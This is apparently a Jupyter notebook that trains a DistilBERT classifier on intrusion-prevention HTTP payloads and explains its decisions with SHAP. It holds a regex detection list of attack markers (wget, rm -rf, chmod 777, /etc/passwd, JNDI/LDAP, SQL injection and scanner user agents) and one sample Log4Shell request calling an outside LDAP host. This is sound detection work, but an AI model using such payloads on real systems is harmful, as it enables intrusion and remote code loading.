In [1]:
import transformers
import torch
import numpy as np
import pandas as pd
import random
import os
from sklearn.model_selection import train_test_split
from sklearn.metrics import precision_recall_fscore_support, accuracy_score
from datasets import load_dataset, load_metric
from transformers import Trainer,TrainingArguments,AutoTokenizer,AutoModelForSequenceClassification,DataCollatorForTokenClassification,EarlyStoppingCallback, BertTokenizer
from datasets import Dataset
import time

In [2]:
model_checkpoint = "distilbert-base-uncased-finetuned-sst-2-english"
batch_size = 32
wd = 0.01
lr = 2e-5
epochs = 5

task = "binary_classification"
label_list = [0,1]
num_labels = 2

In [3]:
def seed_everything(seed:42):
    random.seed(seed)
    np.random.seed(seed)
    os.environ["PYTHONHASHSEED"] = str(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed(seed)  # type: ignore
    torch.backends.cudnn.deterministic = True  # type: ignore
    torch.backends.cudnn.benchmark = True  # type: ignore
    
# fix seed
seed_everything(42)

In [4]:
df = pd.read_csv('IPS_XAI_deploy_20230310.csv')
df.head()

Unnamed: 0,payload,label,ips_00001_payload_base64,ips_00001_payload_sql_comb_01,ips_00001_payload_sql_comb_02,ips_00001_payload_sql_comb_03,ips_00001_payload_xss_comb_01,ips_00001_payload_cmd_comb_01,ips_00001_payload_log4j_comb_01,ips_00001_payload_word_comb_01,ips_00001_payload_word_comb_02,ips_00001_payload_word_comb_03,ips_00001_payload_wp_comb_01,ips_00001_payload_word_comb_04,ips_00001_payload_useragent_comb,ips_00001_payload_whitelist
0,,normal,0,0,0,0,0,0,0,0,0,0,0,0,0,0
1,,normal,0,0,0,0,0,0,0,0,0,0,0,0,0,0
2,,normal,0,0,0,0,0,0,0,0,0,0,0,0,0,0
3,,normal,0,0,0,0,0,0,0,0,0,0,0,0,0,0
4,,normal,0,0,0,0,0,0,0,0,0,0,0,0,0,0


In [6]:
df['label'].value_counts()

normal       15130
anomalies    13250
Name: label, dtype: int64

In [7]:
df = df.sample(10000)

In [8]:
df['label'].value_counts()

normal       5376
anomalies    4624
Name: label, dtype: int64

In [9]:
df.isna().sum()

payload                             365
label                                 0
ips_00001_payload_base64              0
ips_00001_payload_sql_comb_01         0
ips_00001_payload_sql_comb_02         0
ips_00001_payload_sql_comb_03         0
ips_00001_payload_xss_comb_01         0
ips_00001_payload_cmd_comb_01         0
ips_00001_payload_log4j_comb_01       0
ips_00001_payload_word_comb_01        0
ips_00001_payload_word_comb_02        0
ips_00001_payload_word_comb_03        0
ips_00001_payload_wp_comb_01          0
ips_00001_payload_word_comb_04        0
ips_00001_payload_useragent_comb      0
ips_00001_payload_whitelist           0
dtype: int64

In [10]:
df['payload'] = df['payload'].fillna('')

In [11]:
df['label'] = np.where(df['label'] == 'anomalies', 1, 0)
df['label'].value_counts()

0    5376
1    4624
Name: label, dtype: int64

In [12]:
df = df[['payload', 'label']]

In [13]:
df['label'].value_counts()

0    5376
1    4624
Name: label, dtype: int64

In [14]:
train_data, val_data = train_test_split(df, random_state=42,test_size=.2)

In [15]:
print(train_data.shape)
print(val_data.shape)

(8000, 2)
(2000, 2)


In [16]:
df_train = pd.DataFrame({"payload":train_data["payload"],'label':train_data["label"]})
dataset_train = Dataset.from_pandas(df_train)

In [17]:
df_val = pd.DataFrame({"payload": val_data["payload"],'label':val_data["label"]})
dataset_val = Dataset.from_pandas(df_val)

In [18]:
model = AutoModelForSequenceClassification.from_pretrained(model_checkpoint, num_labels=num_labels)
tokenizer = AutoTokenizer.from_pretrained(model_checkpoint)

In [19]:
model.resize_token_embeddings(len(tokenizer))

Embedding(30522, 768, padding_idx=0)

In [20]:
ai_field = ['select(.*?)from', 'select(.*?)count', 'select(.*?)distinct', 'union(.*?)select', 'select(.*?)extractvalue(.*?)xmltype', 'from(.*?)generate(.*?)series', 'from(.*?)group(.*?)by', 'case(.*?)when', 'then(.*?)else', 'like', 'sleep', 'delete', 'waitfor(.*?)delay', 'db(.*?)sql(.*?)server', 'cast(.*?)chr', 'upper(.*?)xmltype', 'script(.*?)alert', 'eval', 'wget(.*?)ttp', 'chmod(.*?)777', 'rm(.*?)rf', 'cd(.*?)tmp', 'jndi(.*?)dap', 'jndi(.*?)dns', 'etc(.*?)passwd', 'document(.*?)createelement', 'cgi(.*?)bin', 'document(.*?)forms', 'document(.*?)location', 'fckeditor(.*?)filemanager', 'manager(.*?)html', 'current_config(.*?)passwd', 'currentsetting(.*?)htm', 'well(.*?)known', 'bash(.*?)history', 'apache(.*?)struts', 'document(.*?)open', 'backup(.*?)sql', 'robots(.*?)txt', 'sqlexec(.*?)php', 'htaccess', 'htpasswd', 'cgi(.*?)cgi', 'api(.*?)ping', 'aaaaaaaaaa', 'cacacacaca', 'mozi[\\.]', 'bingbot', 'md5', 'jpg(.*?)http/1.', 'count(.*?)cgi(.*?)http', 'this(.*?)program(.*?)can', 'get(.*?)ping', 'msadc(.*?)dll(.*?)http', 'filename(.*?)asp', 'filename(.*?)jsp', 'powershell', '[\\.]env', 'wp-login', 'wp-content', 'wp-include', 'wp-config', 'cmd(.*?)open', 'echo(.*?)shellshock', 'php(.*?)echo', 'admin(.*?)php', 'script(.*?)setup(.*?)php', 'phpinfo', 'administrator', 'phpmyadmin', 'access', 'mdb', 'wise(.*?)survey(.*?)admin', 'admin(.*?)serv(.*?)admpw', 'php(.*?)create(.*?)function', 'user(.*?)agent(.*?)zgrab', 'user(.*?)agent(.*?)nmap', 'user(.*?)agent(.*?)dirbuster', 'user(.*?)agent(.*?)ahrefsbot', 'user(.*?)agent(.*?)baiduspider', 'user(.*?)agent(.*?)mj12bot', 'user(.*?)agent(.*?)petalbot', 'user(.*?)agent(.*?)curl/', 'user(.*?)agent(.*?)semrushbot', 'user(.*?)agent(.*?)masscan', 'user(.*?)agent(.*?)sqlmap', 'user(.*?)agent(.*?)urlgrabber(.*?)yum']

In [24]:
# ai_list에 element 안에 '(.*?)'가 포함되어 있는 경우, '(.*?)' 기준으로 split 후, 리스트에 추가
first_ai_list = [x.split('(.*?)')[0] for x in ai_field if '(.*?)' in x]
end_ai_list = [x.split('(.*?)')[1] for x in ai_field if '(.*?)' in x]
except_ai_list = [x.replace('[\\.]', '.') for x in ai_field]
# ai_list의 element 안에 ('*?)' 가 2번 포함되어 있는 경우, 2번째 '(.*?)' 기준으로 split 후, 리스트에 추가
two_ai_list = [x.split('(.*?)')[2] for x in ai_field if x.count('(.*?)') == 2]
# ai_list의 element 안에 ('*?)' 가 3번 포함되어 있는 경우, 3번째 '(.*?)' 기준으로 split 후, 리스트에 추가
three_ai_list = [x.split('(.*?)')[3] for x in ai_field if x.count('(.*?)') == 3]

ai_list_split = first_ai_list + end_ai_list + ai_field + except_ai_list + two_ai_list + three_ai_list

# ai_list_split 안에 중복되는 element 가 있는 경우, 단일 처리
ai_list_split = list(set(ai_list_split))

# ai_list_split 안에 '(.*?' 나, '[\\.]' 가 포함되어 있는 경우, 제거
ai_list_split = [x for x in ai_list_split if '(.*?)' not in x]
ai_list_split = [x for x in ai_list_split if '[\\.]' not in x]

In [25]:
print(ai_list_split)
print(len(ai_list_split))

['count', 'mj12bot', 'cgi', 'upper', 'administrator', 'txt', 'like', 'masscan', 'curl/', 'createelement', 'http', 'wp-config', 'semrushbot', 'dirbuster', 'nmap', 'series', 'manager', 'chmod', 'wp-include', 'dns', 'from', 'msadc', 'aaaaaaaaaa', 'case', 'phpinfo', 'then', 'sleep', 'sql', 'jsp', 'rf', 'union', 'shellshock', 'wise', 'delete', 'get', 'php', 'dap', 'cmd', 'bin', 'by', 'server', 'chr', 'jndi', 'wp-content', 'sqlmap', 'cast', 'ttp', 'dll', 'powershell', 'ping', 'group', 'cacacacaca', 'setup', 'jpg', 'passwd', '.env', 'echo', 'serv', 'forms', 'phpmyadmin', 'wget', 'md5', 'sqlexec', 'select', 'delay', 'function', 'struts', 'mozi.', 'db', 'filemanager', 'ahrefsbot', 'html', 'admpw', 'admin', 'alert', 'filename', 'document', 'bingbot', 'apache', 'htm', 'create', 'mdb', 'current_config', 'htaccess', '777', 'asp', 'fckeditor', 'robots', 'eval', 'else', 'when', 'generate', 'yum', 'http/1.', 'program', 'tmp', 'well', 'htpasswd', 'open', 'wp-login', 'zgrab', 'rm', 'petalbot', 'extractv

In [26]:
# ai_list_split = set(ai_list_split)
len(ai_list_split)

124

In [27]:
new_tokens = set(ai_list_split) - set(tokenizer.vocab.keys())
len(new_tokens)

65

In [28]:
new_tokens

{'.env',
 '777',
 'aaaaaaaaaa',
 'admin',
 'admpw',
 'ahrefsbot',
 'asp',
 'baiduspider',
 'bingbot',
 'cacacacaca',
 'cgi',
 'chmod',
 'chr',
 'cmd',
 'createelement',
 'curl/',
 'current_config',
 'currentsetting',
 'dap',
 'delete',
 'dirbuster',
 'dll',
 'dns',
 'eval',
 'extractvalue',
 'fckeditor',
 'filemanager',
 'filename',
 'htaccess',
 'htm',
 'htpasswd',
 'http/1.',
 'jndi',
 'jpg',
 'jsp',
 'masscan',
 'md5',
 'mdb',
 'mj12bot',
 'mozi.',
 'msadc',
 'nmap',
 'passwd',
 'petalbot',
 'phpinfo',
 'phpmyadmin',
 'powershell',
 'semrushbot',
 'serv',
 'shellshock',
 'sqlexec',
 'sqlmap',
 'struts',
 'tmp',
 'ttp',
 'txt',
 'waitfor',
 'wget',
 'wp-config',
 'wp-content',
 'wp-include',
 'wp-login',
 'xmltype',
 'yum',
 'zgrab'}

In [29]:
# add the tokens to the tokenizer vocabulary
# tokenizer.add_tokens(list(new_tokens))
tokenizer.add_special_tokens({"additional_special_tokens": ai_list_split})

65

In [30]:
# add new, random embeddings for the new tokens
model.resize_token_embeddings(len(tokenizer))

Embedding(30587, 768)

In [31]:
import transformers
assert isinstance(tokenizer, transformers.PreTrainedTokenizerFast)

In [32]:
def tokenize_function(examples):
    return tokenizer(examples["payload"], padding="max_length", max_length = 250, truncation=True)

In [33]:
tokenized_train_datasets = dataset_train.map(tokenize_function, batched=True)
tokenized_val_datasets = dataset_val.map(tokenize_function, batched=True)

100%|██████████| 8/8 [00:00<00:00, 10.51ba/s]
100%|██████████| 2/2 [00:00<00:00, 11.37ba/s]


In [34]:
model_name = model_checkpoint.split("/")[-1]

args = TrainingArguments(
    f"test-{task}",
    evaluation_strategy = "epoch",
    save_strategy = "epoch",
    learning_rate= lr,#2e-5
    per_device_train_batch_size=batch_size,
    per_device_eval_batch_size=batch_size,
    num_train_epochs=epochs,
    seed = 42,
    weight_decay=wd,load_best_model_at_end=True,)

In [35]:
def compute_metrics(pred):
    labels = pred.label_ids
    preds = pred.predictions.argmax(-1)
    precision, recall, f1, _ = precision_recall_fscore_support(labels, preds, average='macro')
    acc = accuracy_score(labels, preds)
    return {
        'accuracy': acc,
        'f1': f1,
        'precision': precision,
        'recall': recall
    }

In [36]:
trainer = Trainer(
    model,
    args,
    train_dataset=tokenized_train_datasets,
    eval_dataset=tokenized_val_datasets,
    tokenizer=tokenizer,
    compute_metrics=compute_metrics,
    callbacks=[EarlyStoppingCallback(early_stopping_patience=3)],   
)

In [37]:
# gpu 또는 mps 자동 학습 시작.
trainer.train()

The following columns in the training set don't have a corresponding argument in `DistilBertForSequenceClassification.forward` and have been ignored: payload, __index_level_0__. If payload, __index_level_0__ are not expected by `DistilBertForSequenceClassification.forward`,  you can safely ignore this message.
***** Running training *****
  Num examples = 8000
  Num Epochs = 5
  Instantaneous batch size per device = 32
  Total train batch size (w. parallel, distributed & accumulation) = 32
  Gradient Accumulation steps = 1
  Total optimization steps = 1250
 20%|██        | 250/1250 [17:25<1:14:25,  4.47s/it]The following columns in the evaluation set don't have a corresponding argument in `DistilBertForSequenceClassification.forward` and have been ignored: payload, __index_level_0__. If payload, __index_level_0__ are not expected by `DistilBertForSequenceClassification.forward`,  you can safely ignore this message.
***** Running Evaluation *****
  Num examples = 2000
  Batch size = 32


{'eval_loss': 0.11842861026525497, 'eval_accuracy': 0.9585, 'eval_f1': 0.9576024329052115, 'eval_precision': 0.9585298742138365, 'eval_recall': 0.956761080842967, 'eval_runtime': 69.5395, 'eval_samples_per_second': 28.761, 'eval_steps_per_second': 0.906, 'epoch': 1.0}


Model weights saved in test-binary_classification/checkpoint-250/pytorch_model.bin
tokenizer config file saved in test-binary_classification/checkpoint-250/tokenizer_config.json
Special tokens file saved in test-binary_classification/checkpoint-250/special_tokens_map.json
 40%|████      | 500/1250 [36:21<52:36,  4.21s/it]  The following columns in the evaluation set don't have a corresponding argument in `DistilBertForSequenceClassification.forward` and have been ignored: payload, __index_level_0__. If payload, __index_level_0__ are not expected by `DistilBertForSequenceClassification.forward`,  you can safely ignore this message.
***** Running Evaluation *****
  Num examples = 2000
  Batch size = 32


{'loss': 0.1925, 'learning_rate': 1.2e-05, 'epoch': 2.0}


                                                  
 40%|████      | 500/1250 [37:30<52:36,  4.21s/it]Saving model checkpoint to test-binary_classification/checkpoint-500
Configuration saved in test-binary_classification/checkpoint-500/config.json


{'eval_loss': 0.11497488617897034, 'eval_accuracy': 0.967, 'eval_f1': 0.9665014069409086, 'eval_precision': 0.9648272201016204, 'eval_recall': 0.9687594003746385, 'eval_runtime': 69.4419, 'eval_samples_per_second': 28.801, 'eval_steps_per_second': 0.907, 'epoch': 2.0}


Model weights saved in test-binary_classification/checkpoint-500/pytorch_model.bin
tokenizer config file saved in test-binary_classification/checkpoint-500/tokenizer_config.json
Special tokens file saved in test-binary_classification/checkpoint-500/special_tokens_map.json
 60%|██████    | 750/1250 [54:12<32:53,  3.95s/it]  The following columns in the evaluation set don't have a corresponding argument in `DistilBertForSequenceClassification.forward` and have been ignored: payload, __index_level_0__. If payload, __index_level_0__ are not expected by `DistilBertForSequenceClassification.forward`,  you can safely ignore this message.
***** Running Evaluation *****
  Num examples = 2000
  Batch size = 32
                                                  
 60%|██████    | 750/1250 [55:20<32:53,  3.95s/it]Saving model checkpoint to test-binary_classification/checkpoint-750
Configuration saved in test-binary_classification/checkpoint-750/config.json


{'eval_loss': 0.10839744657278061, 'eval_accuracy': 0.972, 'eval_f1': 0.9714483536406918, 'eval_precision': 0.9714483536406918, 'eval_recall': 0.9714483536406918, 'eval_runtime': 68.0076, 'eval_samples_per_second': 29.408, 'eval_steps_per_second': 0.926, 'epoch': 3.0}


Model weights saved in test-binary_classification/checkpoint-750/pytorch_model.bin
tokenizer config file saved in test-binary_classification/checkpoint-750/tokenizer_config.json
Special tokens file saved in test-binary_classification/checkpoint-750/special_tokens_map.json
 80%|████████  | 1000/1250 [1:11:46<16:34,  3.98s/it]The following columns in the evaluation set don't have a corresponding argument in `DistilBertForSequenceClassification.forward` and have been ignored: payload, __index_level_0__. If payload, __index_level_0__ are not expected by `DistilBertForSequenceClassification.forward`,  you can safely ignore this message.
***** Running Evaluation *****
  Num examples = 2000
  Batch size = 32


{'loss': 0.0385, 'learning_rate': 4.000000000000001e-06, 'epoch': 4.0}


                                                     
 80%|████████  | 1000/1250 [1:12:54<16:34,  3.98s/it]Saving model checkpoint to test-binary_classification/checkpoint-1000
Configuration saved in test-binary_classification/checkpoint-1000/config.json


{'eval_loss': 0.12299415469169617, 'eval_accuracy': 0.9745, 'eval_f1': 0.9740086000955566, 'eval_precision': 0.9738116197183099, 'eval_recall': 0.9742102155751271, 'eval_runtime': 68.0697, 'eval_samples_per_second': 29.382, 'eval_steps_per_second': 0.926, 'epoch': 4.0}


Model weights saved in test-binary_classification/checkpoint-1000/pytorch_model.bin
tokenizer config file saved in test-binary_classification/checkpoint-1000/tokenizer_config.json
Special tokens file saved in test-binary_classification/checkpoint-1000/special_tokens_map.json
100%|██████████| 1250/1250 [1:31:07<00:00,  4.30s/it]  The following columns in the evaluation set don't have a corresponding argument in `DistilBertForSequenceClassification.forward` and have been ignored: payload, __index_level_0__. If payload, __index_level_0__ are not expected by `DistilBertForSequenceClassification.forward`,  you can safely ignore this message.
***** Running Evaluation *****
  Num examples = 2000
  Batch size = 32
                                                     
100%|██████████| 1250/1250 [1:32:17<00:00,  4.30s/it]Saving model checkpoint to test-binary_classification/checkpoint-1250
Configuration saved in test-binary_classification/checkpoint-1250/config.json


{'eval_loss': 0.1339990198612213, 'eval_accuracy': 0.973, 'eval_f1': 0.9725358559658224, 'eval_precision': 0.9714936383592172, 'eval_recall': 0.973743702067649, 'eval_runtime': 69.44, 'eval_samples_per_second': 28.802, 'eval_steps_per_second': 0.907, 'epoch': 5.0}


Model weights saved in test-binary_classification/checkpoint-1250/pytorch_model.bin
tokenizer config file saved in test-binary_classification/checkpoint-1250/tokenizer_config.json
Special tokens file saved in test-binary_classification/checkpoint-1250/special_tokens_map.json


Training completed. Do not forget to share your model on huggingface.co/models =)


Loading best model from test-binary_classification/checkpoint-750 (score: 0.10839744657278061).
100%|██████████| 1250/1250 [1:32:18<00:00,  4.43s/it]

{'train_runtime': 5538.6006, 'train_samples_per_second': 7.222, 'train_steps_per_second': 0.226, 'train_loss': 0.09581061897277832, 'epoch': 5.0}





TrainOutput(global_step=1250, training_loss=0.09581061897277832, metrics={'train_runtime': 5538.6006, 'train_samples_per_second': 7.222, 'train_steps_per_second': 0.226, 'train_loss': 0.09581061897277832, 'epoch': 5.0})

In [38]:
trainer.evaluate()

The following columns in the evaluation set don't have a corresponding argument in `DistilBertForSequenceClassification.forward` and have been ignored: payload, __index_level_0__. If payload, __index_level_0__ are not expected by `DistilBertForSequenceClassification.forward`,  you can safely ignore this message.
***** Running Evaluation *****
  Num examples = 2000
  Batch size = 32
100%|██████████| 63/63 [01:08<00:00,  1.09s/it]


{'eval_loss': 0.10839744657278061,
 'eval_accuracy': 0.972,
 'eval_f1': 0.9714483536406918,
 'eval_precision': 0.9714483536406918,
 'eval_recall': 0.9714483536406918,
 'eval_runtime': 69.8001,
 'eval_samples_per_second': 28.653,
 'eval_steps_per_second': 0.903,
 'epoch': 5.0}

In [39]:
# 학습 모델 저장
import os
model_save_path = 'YOUR MODEL SAVE PATH !!!!!!!'
model_dir = os.path.join(model_save_path, 'BERT_transfer_model.pkl')
torch.save(model, model_dir)
# orch.save(model.state_dict(), model_dir)

In [40]:
# pytorch 모델 호출
load_model = torch.load(model_dir)
# model.load_state_dict(torch.load(model_dir))
# model.eval()
load_model.eval()

DistilBertForSequenceClassification(
  (distilbert): DistilBertModel(
    (embeddings): Embeddings(
      (word_embeddings): Embedding(30587, 768)
      (position_embeddings): Embedding(512, 768)
      (LayerNorm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
      (dropout): Dropout(p=0.1, inplace=False)
    )
    (transformer): Transformer(
      (layer): ModuleList(
        (0): TransformerBlock(
          (attention): MultiHeadSelfAttention(
            (dropout): Dropout(p=0.1, inplace=False)
            (q_lin): Linear(in_features=768, out_features=768, bias=True)
            (k_lin): Linear(in_features=768, out_features=768, bias=True)
            (v_lin): Linear(in_features=768, out_features=768, bias=True)
            (out_lin): Linear(in_features=768, out_features=768, bias=True)
          )
          (sa_layer_norm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
          (ffn): FFN(
            (dropout): Dropout(p=0.1, inplace=False)
            (lin1): Li

In [41]:
device = torch.device('mps')
device

device(type='mps')

In [42]:
load_model = load_model.to(device)
load_model

DistilBertForSequenceClassification(
  (distilbert): DistilBertModel(
    (embeddings): Embeddings(
      (word_embeddings): Embedding(30587, 768)
      (position_embeddings): Embedding(512, 768)
      (LayerNorm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
      (dropout): Dropout(p=0.1, inplace=False)
    )
    (transformer): Transformer(
      (layer): ModuleList(
        (0): TransformerBlock(
          (attention): MultiHeadSelfAttention(
            (dropout): Dropout(p=0.1, inplace=False)
            (q_lin): Linear(in_features=768, out_features=768, bias=True)
            (k_lin): Linear(in_features=768, out_features=768, bias=True)
            (v_lin): Linear(in_features=768, out_features=768, bias=True)
            (out_lin): Linear(in_features=768, out_features=768, bias=True)
          )
          (sa_layer_norm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
          (ffn): FFN(
            (dropout): Dropout(p=0.1, inplace=False)
            (lin1): Li

In [63]:
sample_df = df[df['payload'].str.contains('jndi', case = False)]
sample_df = sample_df[sample_df['payload'].str.contains('dap', case = False)]

sample_df = sample_df.sample(1)
sample_df.iloc[0,0]

'GET /?krovd=${jndi:ldap://webpage.com/a} HTTP/1.1\nHost: 10.10.123.123\nUser-Agent: curl/7.64.0\nAccept: */*\nConnection: Keep-Alive\nWL-Proxy-SSL: true\nWL-Proxy-Client-IP: 10.10.123.123\nProxy-Client-IP: 10.10.123.123\nX-Forwarded-For: 10.10.123.123\nX-WebLogic-Force-JVMID: 765156318\nX-WebLogic-Request-ClusterInfo: true'

In [64]:
import scipy as sp
import shap

# define a prediction function
def bert_predict(x):
    tv = torch.tensor([tokenizer.encode(v, padding='max_length', max_length=250, truncation=True) for v in x]).to(device)

    # outputs = model(tv)[0].detach().cpu().numpy()
    outputs = load_model(tv)[0].detach().cpu().numpy()

    scores = (np.exp(outputs).T / np.exp(outputs).sum(-1)).T
    val = sp.special.logit(scores[:,1]) # use one vs rest logit units

    return val


In [65]:
# "/" 또는 "HTTP/1.1" 또는 "\s" 또는 "?" 기준으로 분할 regex
masker = shap.maskers.Text(tokenizer = r"(\s|%20|/|%2F|HTTP/1.1|\?)")

In [66]:
pytorch_bert_explainer = shap.Explainer(model = bert_predict, masker = tokenizer)
pytorch_bert_explainer_custom = shap.Explainer(model = bert_predict, masker = masker)

In [67]:
bert_shap_values = pytorch_bert_explainer(sample_df['payload'], fixed_context=1, batch_size=1)
bert_shap_values_custom = pytorch_bert_explainer_custom(sample_df['payload'], fixed_context=1, batch_size=1)

In [68]:
bert_shap_values.data

(array(['', 'GET ', '/', '?', 'k', 'rov', 'd', '=', '$', '{', 'jndi', ':',
        'l', 'dap', ':', '/', '/', 'web', 'page', '.', 'com', '/', 'a',
        '} ', 'HTTP', '/', '1', '.', '1\n', 'Host', ': ', '10', '.', '10',
        '.', '123', '.', '123\n', 'User', '-', 'Agent', ': ', 'curl/', '7',
        '.', '64', '.', '0\n', 'Accept', ': ', '*', '/', '*\n',
        'Connection', ': ', 'Keep', '-', 'Alive\n', 'W', 'L', '-', 'Proxy',
        '-', 'SS', 'L', ': ', 'true\n', 'W', 'L', '-', 'Proxy', '-',
        'Client', '-', 'IP', ': ', '10', '.', '10', '.', '123', '.',
        '123\n', 'Proxy', '-', 'Client', '-', 'IP', ': ', '10', '.', '10',
        '.', '123', '.', '123\n', 'X', '-', 'Forward', 'ed', '-', 'For',
        ': ', '10', '.', '10', '.', '123', '.', '123\n', 'X', '-', 'Web',
        'Logic', '-', 'Force', '-', 'J', 'V', 'MI', 'D', ': ', '76', '51',
        '56', '31', '8\n', 'X', '-', 'Web', 'Logic', '-', 'Request', '-',
        'Cluster', 'In', 'fo', ': ', 'true', ''], dty

In [69]:
bert_shap_values_custom.data

(array(['GET ', '/', '?', 'krovd=${jndi:ldap:/', '/', 'webpage.com/',
        'a} ', 'HTTP/1.1', '\n', 'Host: ', '10.10.123.123\n',
        'User-Agent: ', 'curl/', '7.64.0\n', 'Accept: ', '*/', '*\n',
        'Connection: ', 'Keep-Alive\n', 'WL-Proxy-SSL: ', 'true\n',
        'WL-Proxy-Client-IP: ', '10.10.123.123\n', 'Proxy-Client-IP: ',
        '10.10.123.123\n', 'X-Forwarded-For: ', '10.10.123.123\n',
        'X-WebLogic-Force-JVMID: ', '765156318\n',
        'X-WebLogic-Request-ClusterInfo: ', 'true'], dtype=object),)

In [70]:
shap.text_plot(bert_shap_values, display = True)

In [71]:
shap.text_plot(bert_shap_values_custom, display = True)

In [72]:
bert_shap_values.abs.sum(0)

.values =
array([1.44669508e-01, 6.67420619e-01, 1.41293069e+00, 6.77691884e-01,
       2.59804549e-01, 7.63196765e-01, 6.87309783e-02, 7.70313225e-02,
       6.10348501e-02, 4.92259789e-02, 5.55325203e-01, 2.60498691e+00,
       2.39945369e-01, 1.80884979e+00, 5.68109608e-02, 1.30862489e-01,
       2.10515233e+00, 1.07286925e-01, 5.57432925e-01, 6.83317805e-01,
       7.85984575e-01, 1.51570708e-01, 4.46332994e-02, 7.91629681e-01,
       1.02293705e+00, 5.21527779e-01, 3.68196319e+00, 6.74602789e-01,
       4.07489163e-01, 3.15299214e-02, 2.92855634e-04, 1.43758986e-01,
       1.64004590e-01, 1.19482390e-01, 8.65353604e-02, 4.25597956e-01,
       5.00917931e-02, 1.50142360e+00, 1.43212484e+00, 1.01560458e+00,
       3.47540724e-02, 1.19905257e+00, 6.83251756e-01, 4.30380547e-01,
       3.19684326e-01, 2.50874935e-01, 1.77934783e-02, 7.47932775e-02,
       2.02705956e-01, 2.26837016e-01, 1.29339237e-01, 2.48497832e-01,
       4.84639239e-01, 5.14429993e-02, 2.26882595e-01, 1.36375686e-

In [73]:
bert_shap_values.values.sum(0)

array([-6.49943284e-02, -6.67420619e-01, -3.28368061e-01,  6.77691884e-01,
        2.59804549e-01, -7.63196765e-01, -6.87309783e-02, -7.70313225e-02,
        6.10348501e-02,  4.92259789e-02,  5.55325203e-01,  3.39818888e-01,
       -2.39945369e-01,  1.80884979e+00,  3.22747980e-01, -2.91008796e-01,
        3.58852489e-02, -5.68109608e-02,  1.30862489e-01,  9.91050744e-02,
       -1.07286925e-01, -5.53387994e-01,  5.57432925e-01, -6.83317805e-01,
       -7.85984575e-01, -2.18501683e-02,  6.97656278e-02,  1.06070245e-02,
       -8.18050799e-02,  4.46332994e-02, -1.56694263e-01, -2.40820974e-01,
        7.93698135e-02, -2.24317693e-01,  6.95166614e-03,  1.64551499e-02,
        5.05945447e-02, -3.03508151e-01,  5.21527779e-01, -3.14821023e-01,
        6.74602789e-01,  2.15987068e-01,  4.07489163e-01, -3.15299214e-02,
        1.11191255e-01, -2.92855634e-04,  2.70461720e-01,  1.43758986e-01,
       -1.64004590e-01, -3.00616171e-01, -3.42673322e-02,  1.82430420e-01,
       -8.52150580e-02, -

In [74]:
len(bert_shap_values.abs.sum(0))

64